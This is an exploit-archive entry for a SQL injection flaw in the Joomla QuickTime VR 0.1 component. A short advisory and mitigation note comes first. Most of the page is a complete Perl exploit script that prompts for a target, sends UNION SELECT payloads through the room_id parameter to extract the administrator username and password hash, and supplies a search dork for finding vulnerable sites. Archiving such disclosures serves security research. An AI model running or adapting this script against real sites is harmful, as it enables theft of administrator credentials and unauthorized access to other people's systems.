Joomla Component QuickTime VR v 0.1 Remote SQL Injection

vendor:

QuickTime VR

by:

Houssamix From H-T Team

CVSS

HIGH

SQL Injection

CWE

Product Name: QuickTime VR

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2007

Joomla Component QuickTime VR v 0.1 Remote SQL Injection

A remote SQL injection vulnerability exists in Joomla Component QuickTime VR v 0.1. An attacker can exploit this vulnerability to gain access to the admin panel of the application. The vulnerability is due to improper sanitization of user-supplied input in the 'room_id' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can allow an attacker to gain access to the admin panel of the application.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the application.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w

#   Joomla Component QuickTime VR v 0.1  Remote SQL Injection #
########################################
#[*] Found by : Houssamix From H-T Team 
#[*] H-T Team [ HouSSaMix + ToXiC350 ] 
#[*] Greetz : Mr.Al3FrItE & Islamic Security Team  & Mounita20 & CoNaN and all musulmans hackers

#[*] Component_Name:  QuickTime VR
#[*] Script_Name: Joomla
#[*] Dork : index.php?option=com_vr
########################################
# <name>QuickTime VR</name>
# <creationDate>Januari 2007</creationDate>
# <author>Bob</author>
# <copyright>Pictura</copyright>
# <authorEmail>bob@pictura-dp.nl</authorEmail>
# <authorUrl>http://www.pictura-dp.nl/</authorUrl>
#  <version>0.1</version> 


system("color f");
print "\t\t########################################################\n\n";
print "\t\t#                        Viva Islam                    #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Joomla Component QuickTime VR Remote SQL Injection   #\n\n";
print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]	              #\n\n";
print "\t\t########################################################\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/joomla/): ";
	chomp(my $target=<STDIN>);

$uname="username";
$magic="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),2 from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /<user>(.*?)<user>/){
       
		print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20password,2/**/from/**/jos_users--";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
		print "\n[+] Admin Hash : $1\n\n";
		print "#   Exploit succeed!  #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}

# codec  by Houssamix From H-T Team

# milw0rm.com [2008-07-02]